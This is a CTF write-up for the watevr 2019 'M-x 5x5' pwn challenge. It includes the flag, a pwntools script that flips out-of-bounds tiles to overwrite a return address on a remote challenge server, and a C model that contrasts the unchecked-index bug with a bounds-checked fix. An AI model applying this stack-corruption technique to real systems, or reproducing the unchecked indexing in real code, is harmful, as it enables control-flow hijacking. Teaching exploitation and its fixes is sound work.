Tags: pwn
See the [full writeup](https://github.com/happysox/CTF_Writeups/tree/master/watevr_CTF_2019/M-x_5x5).
### TL;DR
[x64 binary](./M-x-5x5)
* Tile flipping game played over netcat
* Like http://www.logicgamesonline.com/lightsout/
* Board is stored on the stack
* Out of bounds "flips" = partial XOR of a return address => win function

**watevr{maybe_well_implement_M-x_tetris_some_day}**

```python
#!/usr/bin/python2
from pwn import *

# Suppress pwntools connection logging while opening the tube
with context.quiet:
    #p = process('./M-x-5x5')
    p = remote('13.53.187.163', 50000)

p.sendline()
p.sendlineafter('8)? ', "8") # Size of board doesn't actually matter

#gdb.attach(p, """
#    b *0x4008f7
#    b *0x0000000000400acc
#    b *0x00000000004008ae
#""")

xors_1 = [3, 5, 6, 8]
xors_2 = [1, 4]

# Flipping the correct tiles => actually XORing
# parts of the main loop's return pointer on the stack
for x in xors_1:
    p.sendlineafter('q]: ', "f %s 17" % str(x)) # Flip row 17, col x
for x in xors_2:
    p.sendlineafter('q]: ', "f %s 16" % str(x)) # Flip row 16, col x

# Quit the game loop so the modified return address is used
p.sendlineafter('q]: ', "q")
p.interactive()
p.close()
```
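
The bug class from the TL;DR, shown next to its fix in a simplified C model. This is an added example, not the challenge's source or the writeup author's code. The frame layout, `FRAME_ROWS`, the Lights Out neighbour rule and all function names are assumptions for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define N 8            /* board side (the size the page's script selects) */
#define FRAME_ROWS 20  /* assumed: memory above the board, modelled as extra rows */

/* Simulated stack frame: rows 0..N-1 are the board, rows N and up stand in
 * for saved registers and the return address. One array keeps the stray
 * writes observable without real undefined behaviour in this demo. */
typedef struct { uint8_t mem[FRAME_ROWS * N]; } frame_t;
static const int DR[5] = {0, -1, 1, 0, 0}, DC[5] = {0, 0, 0, -1, 1};

/* Vulnerable pattern: tile and neighbours are XORed at unchecked indices. */
static void flip_unchecked(frame_t *f, int row, int col) {
    for (int i = 0; i < 5; i++)
        f->mem[(row + DR[i]) * N + (col + DC[i])] ^= 1;
}

/* Hardened: reject off-board input, and clip neighbours at the edges. */
static bool flip_checked(frame_t *f, int row, int col) {
    if (row < 0 || row >= N || col < 0 || col >= N) return false;
    for (int i = 0; i < 5; i++) {
        int r = row + DR[i], c = col + DC[i];
        if (r >= 0 && r < N && c >= 0 && c < N) f->mem[r * N + c] ^= 1;
    }
    return true;
}

/* Count modified bytes outside the board region of a zero-initialised frame. */
static int stray_writes(const frame_t *f) {
    int n = 0;
    for (int i = N * N; i < FRAME_ROWS * N; i++) n += f->mem[i] != 0;
    return n;
}

/* Run one flip on a zeroed frame; return stray bytes, or -1 if rejected. */
static int run(bool checked, int row, int col) {
    frame_t f = {{0}};
    if (checked) { if (!flip_checked(&f, row, col)) return -1; }
    else flip_unchecked(&f, row, col);
    return stray_writes(&f);
}

int main(void) {
    printf("unchecked (17,3): %d, (7,3): %d stray bytes\n",
           run(false, 17, 3), run(false, 7, 3));
    printf("checked   (17,3): %d, (7,3): %d\n", run(true, 17, 3), run(true, 7, 3));
    return 0;
}
```

In this model even a legal edge tile such as `(7,3)` writes one byte past the board when neighbours are not clipped, so the fix needs both the input check and the per-neighbour check.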